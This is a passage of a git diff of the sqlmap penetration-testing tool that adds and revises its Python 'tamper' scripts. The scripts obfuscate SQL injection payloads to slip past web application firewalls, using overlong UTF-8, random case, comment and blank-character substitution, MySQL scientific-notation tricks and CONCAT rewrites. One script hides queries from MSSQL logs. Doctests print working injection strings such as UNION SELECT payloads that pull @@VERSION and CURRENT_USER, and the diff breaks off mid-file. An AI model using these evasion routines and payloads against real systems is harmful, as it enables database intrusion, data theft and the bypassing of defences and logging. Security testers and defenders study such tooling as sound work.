b/tamper/overlongutf8.py new file mode 100644 index 00000000000..75bd678e775 --- /dev/null +++ b/tamper/overlongutf8.py @@ -0,0 +1,46 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import string + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOWEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7) + + Reference: + * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ + * https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ + + >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') + 'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1' + """ + + retVal = payload + + if payload: + retVal = "" + i = 0 + + while i < len(payload): + if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: + retVal += payload[i:i + 3] + i += 3 + else: + if payload[i] not in (string.ascii_letters + string.digits): + retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f)) + else: + retVal += payload[i] + i += 1 + + return retVal diff --git a/tamper/overlongutf8more.py b/tamper/overlongutf8more.py new file mode 100644 index 00000000000..391464f6ef7 --- /dev/null +++ b/tamper/overlongutf8more.py @@ -0,0 +1,43 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import string + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOWEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) + + Reference: + * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ + * https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ + + >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') + '%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1' + """ + + retVal = payload + + if payload: + retVal = "" + i = 0 + + while i < len(payload): + if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: + retVal += payload[i:i + 3] + i += 3 + else: + retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f)) + i += 1 + + return retVal diff --git a/tamper/percentage.py b/tamper/percentage.py index 71bb40bc96c..4f4da1f6186 100644 --- a/tamper/percentage.py +++ b/tamper/percentage.py @@ -1,15 +1,15 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os import string -from lib.core.enums import PRIORITY from lib.core.common import singleTimeWarnMessage +from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW @@ -18,11 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Adds a percentage sign ('%') infront of each character - - Example: - * Input: SELECT FIELD FROM TABLE - * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E + Adds a percentage sign ('%') infront of each character (e.g. SELECT -> %S%E%L%E%C%T) Requirement: * ASP @@ -34,6 +30,9 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass weak and bespoke web application firewalls + + >>> tamper('SELECT FIELD FROM TABLE') + '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E' """ if payload: diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py new file mode 100644 index 00000000000..a1738a11079 --- /dev/null +++ b/tamper/plus2concat.py @@ -0,0 +1,55 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.common import zeroDepthSearch +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) + +def tamper(payload, **kwargs): + """ + Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart + + Tested against: + * Microsoft SQL Server 2012 + + Requirements: + * Microsoft SQL Server 2012+ + + Notes: + * Useful in case ('+') character is filtered + + >>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL') + 'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL' + + >>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe') + '1 UNION ALL SELECT NULL,NULL,CONCAT(CHAR(113),CHAR(118),CHAR(112),CHAR(112),CHAR(113),ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)),CHAR(113),CHAR(112),CHAR(107),CHAR(112),CHAR(113))-- qtfe' + """ + + retVal = payload + + if payload: + match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal) + if match: + part = match.group(0) + + chars = [char for char in part] + for index in zeroDepthSearch(part, '+'): + chars[index] = ',' + + replacement = "CONCAT(%s)" % "".join(chars) + retVal = retVal.replace(part, replacement) + + return retVal diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py new file mode 100644 index 00000000000..0706275e904 --- /dev/null +++ b/tamper/plus2fnconcat.py @@ -0,0 +1,64 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.common import zeroDepthSearch +from lib.core.compat import xrange +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) + +def tamper(payload, **kwargs): + """ + Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart + + Tested against: + * Microsoft SQL Server 2008 + + Requirements: + * Microsoft SQL Server 2008+ + + Notes: + * Useful in case ('+') character is filtered + * https://msdn.microsoft.com/en-us/library/bb630290.aspx + + >>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL') + 'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL' + + >>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe') + '1 UNION ALL SELECT NULL,NULL,{fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT(CHAR(113),CHAR(118))},CHAR(112))},CHAR(112))},CHAR(113))},ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)))},CHAR(113))},CHAR(112))},CHAR(107))},CHAR(112))},CHAR(113))}-- qtfe' + """ + + retVal = payload + + if payload: + match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal) + if match: + old = match.group(0) + parts = [] + last = 0 + + for index in zeroDepthSearch(old, '+'): + parts.append(old[last:index].strip('+')) + last = index + + parts.append(old[last:].strip('+')) + replacement = parts[0] + + for i in xrange(1, len(parts)): + replacement = "{fn CONCAT(%s,%s)}" % (replacement, parts[i]) + + retVal = retVal.replace(old, replacement) + + return retVal diff --git a/tamper/randomcase.py b/tamper/randomcase.py index b8da136a5bb..24cf7876ff7 100644 --- a/tamper/randomcase.py +++ b/tamper/randomcase.py @@ -1,13 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from lib.core.common import randomRange +from lib.core.compat import xrange from lib.core.data import kb from lib.core.enums import PRIORITY @@ -18,35 +19,47 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces each keyword character with random case value - - Example: - * Input: INSERT - * Output: InsERt + Replaces each keyword character with random case value (e.g. SELECT -> SEleCt) Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 + * SQLite 3 Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions * This tamper script should work against all (?) databases + + >>> import random + >>> random.seed(0) + >>> tamper('INSERT') + 'InSeRt' + >>> tamper('f()') + 'f()' + >>> tamper('function()') + 'FuNcTiOn()' + >>> tamper('SELECT id FROM `user`') + 'SeLeCt id FrOm `user`' """ retVal = payload if payload: - for match in re.finditer(r"[A-Za-z_]+", retVal): + for match in re.finditer(r"\b[A-Za-z_]{2,}\b", retVal): word = match.group() - if word.upper() in kb.keywords: - _ = str() + if (word.upper() in kb.keywords and re.search(r"(?i)[`\"'\[]%s[`\"'\]]" % word, retVal) is None) or ("%s(" % word) in payload: + while True: + _ = "" + + for i in xrange(len(word)): + _ += word[i].upper() if randomRange(0, 1) else word[i].lower() - for i in xrange(len(word)): - _ += word[i].upper() if randomRange(0, 1) else word[i].lower() + if len(_) > 1 and _ not in (_.lower(), _.upper()): + break retVal = retVal.replace(word, _) diff --git a/tamper/randomcomments.py b/tamper/randomcomments.py index a81f63f56a1..a4a185f79ad 100644 --- a/tamper/randomcomments.py +++ b/tamper/randomcomments.py @@ -1,13 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from lib.core.common import randomRange +from lib.core.compat import xrange from lib.core.data import kb from lib.core.enums import PRIORITY @@ -15,14 +16,18 @@ def tamper(payload, **kwargs): """ - Add random comments to SQL keywords - Example: 'INSERT' becomes 'IN/**/S/**/ERT' + Inserts random inline comments within SQL keywords (e.g. SELECT -> S/**/E/**/LECT) + + >>> import random + >>> random.seed(0) + >>> tamper('INSERT') + 'I/**/NS/**/ERT' """ retVal = payload if payload: - for match in re.finditer(r"[A-Za-z_]+", payload): + for match in re.finditer(r"\b[A-Za-z_]+\b", payload): word = match.group() if len(word) < 2: @@ -35,6 +40,11 @@ def tamper(payload, **kwargs): _ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i]) _ += word[-1] + + if "/**/" not in _: + index = randomRange(1, len(word) - 1) + _ = word[:index] + "/**/" + word[index:] + retVal = retVal.replace(word, _) return retVal diff --git a/tamper/schemasplit.py b/tamper/schemasplit.py new file mode 100644 index 00000000000..07a4b2a7bbe --- /dev/null +++ b/tamper/schemasplit.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Splits FROM schema identifiers (e.g. 'testdb.users') with whitespace (e.g. 'testdb 9.e.users') + + Requirement: + * MySQL + + Notes: + * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf + + >>> tamper('SELECT id FROM testdb.users') + 'SELECT id FROM testdb 9.e.users' + """ + + return re.sub(r"(?i)( FROM \w+)\.(\w+)", r"\g<1> 9.e.\g<2>", payload) if payload else payload diff --git a/tamper/scientific.py b/tamper/scientific.py new file mode 100644 index 00000000000..a9dc194dccf --- /dev/null +++ b/tamper/scientific.py @@ -0,0 +1,35 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Abuses MySQL scientific notation + + Requirement: + * MySQL + + Notes: + * Reference: https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/ + + >>> tamper('1 AND ORD(MID((CURRENT_USER()),7,1))>1') + '1 AND ORD 1.e(MID((CURRENT_USER 1.e( 1.e) 1.e) 1.e,7 1.e,1 1.e) 1.e)>1' + """ + + if payload: + payload = re.sub(r"[),.*^/|&]", r" 1.e\g<0>", payload) + payload = re.sub(r"(\w+)\(", lambda match: "%s 1.e(" % match.group(1) if not re.search(r"(?i)\A(MID|CAST|FROM|COUNT)\Z", match.group(1)) else match.group(0), payload) # NOTE: MID and CAST don't work for sure + + return payload diff --git a/tamper/securesphere.py b/tamper/securesphere.py deleted file mode 100644 index 9b9a8e8f18f..00000000000 --- a/tamper/securesphere.py +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Appends special crafted string - - Example: - * Input: AND 1=1 - * Output: AND 1=1 and '0having'='0having' - - Notes: - * Useful for bypassing Imperva SecureSphere WAF - * Reference: http://seclists.org/fulldisclosure/2011/May/163 - """ - - return payload + " and '0having'='0having'" if payload else payload diff --git a/tamper/sleep2getlock.py b/tamper/sleep2getlock.py new file mode 100644 index 00000000000..cf2797936a3 --- /dev/null +++ b/tamper/sleep2getlock.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import kb +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces instances like 'SLEEP(5)' with (e.g.) "GET_LOCK('ETgP',5)" + + Requirement: + * MySQL + + Tested against: + * MySQL 5.0 and 5.5 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that filter the SLEEP() and BENCHMARK() functions + + * Reference: https://zhuanlan.zhihu.com/p/35245598 + + >>> tamper('SLEEP(5)') == "GET_LOCK('%s',5)" % kb.aliasName + True + """ + + if payload: + payload = payload.replace("SLEEP(", "GET_LOCK('%s'," % kb.aliasName) + + return payload diff --git a/tamper/sp_password.py b/tamper/sp_password.py index af7934abaf9..4efcc1c98e8 100644 --- a/tamper/sp_password.py +++ b/tamper/sp_password.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import PRIORITY @@ -11,11 +11,7 @@ def tamper(payload, **kwargs): """ - Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs - - Example: - * Input: 1 AND 9227=9227-- - * Output: 1 AND 9227=9227--sp_password + Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs Requirement: * MSSQL @@ -23,6 +19,9 @@ def tamper(payload, **kwargs): Notes: * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure * Reference: http://websec.ca/kb/sql_injection + + >>> tamper('1 AND 9227=9227-- ') + '1 AND 9227=9227-- sp_password' """ retVal = "" diff --git a/tamper/space2comment.py b/tamper/space2comment.py index 89022472d58..818e118526e 100644 --- a/tamper/space2comment.py +++ b/tamper/space2comment.py @@ -1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW @@ -16,10 +17,6 @@ def tamper(payload, **kwargs): """ Replaces space character (' ') with comments '/**/' - Example: - * Input: SELECT id FROM users - * Output: SELECT/**/id/**/FROM/**/users - Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 @@ -28,6 +25,9 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass weak and bespoke web application firewalls + + >>> tamper('SELECT id FROM users') + 'SELECT/**/id/**/FROM/**/users' """ retVal = payload diff --git a/tamper/space2dash.py b/tamper/space2dash.py index 2362fdee00a..b865e60fcf3 100644 --- a/tamper/space2dash.py +++ b/tamper/space2dash.py @@ -1,36 +1,34 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import random import string +from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def tamper(payload, **kwargs): """ - Replaces space character (' ') with a dash comment ('--') followed by - a random string and a new line ('\n') - - Example: - * Input: 1 AND 9227=9227 - * Output: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227 + Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') Requirement: * MSSQL * SQLite - Tested against: - Notes: * Useful to bypass several web application firewalls * Used during the ZeroNights SQL injection challenge, https://proton.onsec.ru/contest/ + + >>> random.seed(0) + >>> tamper('1 AND 9227=9227') + '1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227' """ retVal = "" @@ -38,7 +36,7 @@ def tamper(payload, **kwargs): if payload: for i in xrange(len(payload)): if payload[i].isspace(): - randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for _ in xrange(random.randint(6, 12))) + randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) retVal += "--%s%%0A" % randomStr elif payload[i] == '#' or payload[i:i + 3] == '-- ': retVal += payload[i:] diff --git a/tamper/space2hash.py b/tamper/space2hash.py index e0271850604..4a8d6916dc2 100644 --- a/tamper/space2hash.py +++ b/tamper/space2hash.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os @@ -10,6 +10,7 @@ import string from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.enums import DBMS from lib.core.enums import PRIORITY @@ -20,12 +21,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a pound character ('#') followed by - a random string and a new line ('\n') - - Example: - * Input: 1 AND 9227=9227 - * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 + Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') Requirement: * MySQL @@ -37,6 +33,10 @@ def tamper(payload, **kwargs): * Useful to bypass several web application firewalls * Used during the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html + + >>> random.seed(0) + >>> tamper('1 AND 9227=9227') + '1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227' """ retVal = "" @@ -44,7 +44,7 @@ def tamper(payload, **kwargs): if payload: for i in xrange(len(payload)): if payload[i].isspace(): - randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for _ in xrange(random.randint(6, 12))) + randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) retVal += "%%23%s%%0A" % randomStr elif payload[i] == '#' or payload[i:i + 3] == '-- ': retVal += payload[i:] diff --git a/tamper/space2morecomment.py b/tamper/space2morecomment.py new file mode 100644 index 00000000000..df823e70660 --- /dev/null +++ b/tamper/space2morecomment.py @@ -0,0 +1,55 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.compat import xrange +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces (MySQL) instances of space character (' ') with comments '/**_**/' + + Tested against: + * MySQL 5.0 and 5.5 + + Notes: + * Useful to bypass weak and bespoke web application firewalls + + >>> tamper('SELECT id FROM users') + 'SELECT/**_**/id/**_**/FROM/**_**/users' + """ + + retVal = payload + + if payload: + retVal = "" + quote, doublequote, firstspace = False, False, False + + for i in xrange(len(payload)): + if not firstspace: + if payload[i].isspace(): + firstspace = True + retVal += "/**_**/" + continue + + elif payload[i] == '\'': + quote = not quote + + elif payload[i] == '"': + doublequote = not doublequote + + elif payload[i] == " " and not doublequote and not quote: + retVal += "/**_**/" + continue + + retVal += payload[i] + + return retVal diff --git a/tamper/space2morehash.py b/tamper/space2morehash.py index 6d759b9e828..d6365f9b77f 100644 --- a/tamper/space2morehash.py +++ b/tamper/space2morehash.py @@ -1,16 +1,17 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os -import re import random +import re import string from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.data import kb from lib.core.enums import DBMS from lib.core.enums import PRIORITY @@ -23,12 +24,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a pound character ('#') followed by - a random string and a new line ('\n') - - Example: - * Input: 1 AND 9227=9227 - * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 + Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') Requirement: * MySQL >= 5.1.13 @@ -40,11 +36,15 @@ def tamper(payload, **kwargs): * Useful to bypass several web application firewalls * Used during the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html + + >>> random.seed(0) + >>> tamper('1 AND 9227=9227') + '1%23RcDKhIr%0AAND%23upgPydUzKpMX%0A%23lgbaxYjWJ%0A9227=9227' """ def process(match): word = match.group('word') - randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for _ in xrange(random.randint(6, 12))) + randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr)) @@ -54,11 +54,11 @@ def process(match): retVal = "" if payload: - payload = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), payload) + payload = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, payload) for i in xrange(len(payload)): if payload[i].isspace(): - randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for _ in xrange(random.randint(6, 12))) + randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) retVal += "%%23%s%%0A" % randomStr elif payload[i] == '#' or payload[i:i + 3] == '-- ': retVal += payload[i:] diff --git a/tamper/space2mssqlblank.py b/tamper/space2mssqlblank.py index 22f7f390664..0413f447413 100644 --- a/tamper/space2mssqlblank.py +++ b/tamper/space2mssqlblank.py @@ -1,14 +1,15 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os import random from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.enums import DBMS from lib.core.enums import PRIORITY @@ -19,12 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters - - Example: - * Input: SELECT id FROM users - * Output: SELECT%08id%02FROM%0Fusers + Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters Requirement: * Microsoft SQL Server @@ -35,6 +31,10 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass several web application firewalls + + >>> random.seed(0) + >>> tamper('SELECT id FROM users') + 'SELECT%0Did%0DFROM%04users' """ # ASCII table: diff --git a/tamper/space2mssqlhash.py b/tamper/space2mssqlhash.py index d72d8f07cdc..49ac43a0a51 100644 --- a/tamper/space2mssqlhash.py +++ b/tamper/space2mssqlhash.py @@ -1,22 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def tamper(payload, **kwargs): """ - Replaces space character (' ') with a pound character ('#') followed by - a new line ('\n') - - Example: - * Input: 1 AND 9227=9227 - * Output: 1%23%0A9227=9227 + Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') Requirement: * MSSQL @@ -24,6 +20,9 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass several web application firewalls + + >>> tamper('1 AND 9227=9227') + '1%23%0AAND%23%0A9227=9227' """ retVal = "" diff --git a/tamper/space2mysqlblank.py b/tamper/space2mysqlblank.py index 0eb3924ac96..a0891989ca6 100644 --- a/tamper/space2mysqlblank.py +++ b/tamper/space2mysqlblank.py @@ -1,14 +1,15 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os import random from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.enums import DBMS from lib.core.enums import PRIORITY @@ -19,12 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters - - Example: - * Input: SELECT id FROM users - * Output: SELECT%0Bid%0BFROM%A0users + Replaces (MySQL) instances of space character (' ') with a random blank character from a valid set of alternate characters Requirement: * MySQL @@ -34,6 +30,10 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass several web application firewalls + + >>> random.seed(0) + >>> tamper('SELECT id FROM users') + 'SELECT%A0id%0CFROM%0Dusers' """ # ASCII table: @@ -42,7 +42,7 @@ def tamper(payload, **kwargs): # FF 0C new page # CR 0D carriage return # VT 0B vertical TAB (MySQL and Microsoft SQL Server only) - # - A0 - (MySQL only) + # A0 non-breaking space blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0') retVal = payload diff --git a/tamper/space2mysqldash.py b/tamper/space2mysqldash.py index e7a4d4d5336..e5fb85aafab 100644 --- a/tamper/space2mysqldash.py +++ b/tamper/space2mysqldash.py @@ -1,13 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.enums import DBMS from lib.core.enums import PRIORITY @@ -18,21 +19,17 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a dash comment ('--') followed by - a new line ('\n') - - Example: - * Input: 1 AND 9227=9227 - * Output: 1--%0AAND--%0A9227=9227 + Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') Requirement: * MySQL * MSSQL - Tested against: - Notes: * Useful to bypass several web application firewalls. + + >>> tamper('1 AND 9227=9227') + '1--%0AAND--%0A9227=9227' """ retVal = "" diff --git a/tamper/space2plus.py b/tamper/space2plus.py index ede26ba0982..a6ec73fc093 100644 --- a/tamper/space2plus.py +++ b/tamper/space2plus.py @@ -1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW @@ -16,14 +17,12 @@ def tamper(payload, **kwargs): """ Replaces space character (' ') with plus ('+') - Example: 